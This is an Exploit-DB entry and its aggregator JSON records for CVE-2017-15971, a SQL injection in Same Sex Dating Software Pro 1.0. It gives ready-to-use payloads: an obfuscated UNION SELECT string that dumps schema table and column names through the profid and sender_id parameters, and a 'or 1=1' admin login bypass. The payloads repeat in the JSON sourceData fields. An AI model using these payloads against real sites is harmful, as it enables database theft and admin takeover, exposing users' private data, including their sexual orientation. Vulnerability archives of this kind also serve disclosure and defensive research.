ID EDB-ID:43088
Type exploitdb
Reporter Exploit-DB
Modified 2017-10-30T00:00:00
Description
Same Sex Dating Software Pro 1.0 - SQL Injection. CVE-2017-15971. Webapps exploit for PHP platform
# # # # #
# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.softdatepro.com/
# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959
# Demo: http://www.ss.softdatepro.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15971
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
#
# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
#
# http://localhost/[PATH]/admin
#
# Email: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
{"id": "EDB-ID:43088", "hash": "e3a6ac55deb6794037e88bc07ec0d2ed", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Same Sex Dating Software Pro 1.0 - SQL Injection", "description": "Same Sex Dating Software Pro 1.0 - SQL Injection. CVE-2017-15971. Webapps exploit for PHP platform", "published": "2017-10-30T00:00:00", "modified": "2017-10-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43088/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-15971"], "lastseen": "2017-10-31T00:31:47", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2017-10-31T00:31:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-15971"]}, {"type": "zdt", "idList": ["1337DAY-ID-28918"]}], "modified": "2017-10-31T00:31:47"}, "vulnersScore": 3.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/43088/", "sourceData": "# # # # # \r\n# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 30.10.2017\r\n# Vendor Homepage: http://www.softdatepro.com/\r\n# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959\r\n# Demo: http://www.ss.softdatepro.com/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2017-15971\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an users to inject sql commands....\r\n# \t\r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/viewprofile.php?profid=[SQL]\r\n# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]\r\n# \r\n# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-\r\n# \r\n# http://localhost/[PATH]/admin\r\n# \r\n# Email: 'or 1=1 or ''=' Pass: anything\r\n# \r\n# Etc..\r\n# # # # #", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:16:54", "bulletinFamily": "NVD", "description": "Same Sex Dating Software Pro 1.0 allows SQL Injection via the viewprofile.php profid parameter, the viewmessage.php sender_id parameter, or the /admin Email field, a related issue to CVE-2017-15972.", "modified": "2017-11-17T16:17:00", "id": "CVE-2017-15971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15971", "published": "2017-10-29T06:29:00", "title": "CVE-2017-15971", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-13T20:32:57", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "href": "https://0day.today/exploit/description/28918", "id": "1337DAY-ID-28918", "title": "Same Sex Dating Software Pro 1.0 - SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # # # \r\n# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection\r\n# Vendor Homepage: http://www.softdatepro.com/\r\n# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959\r\n# Demo: http://www.ss.softdatepro.com/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2017-15971\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an users to inject sql commands....\r\n# \r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/viewprofile.php?profid=[SQL]\r\n# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]\r\n# \r\n# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)[email\u00a0protected]:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-\r\n# \r\n# http://localhost/[PATH]/admin\r\n# \r\n# Email: 'or 1=1 or ''=' Pass: anything\r\n# \r\n# Etc..\r\n# # # # #\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28918"}]}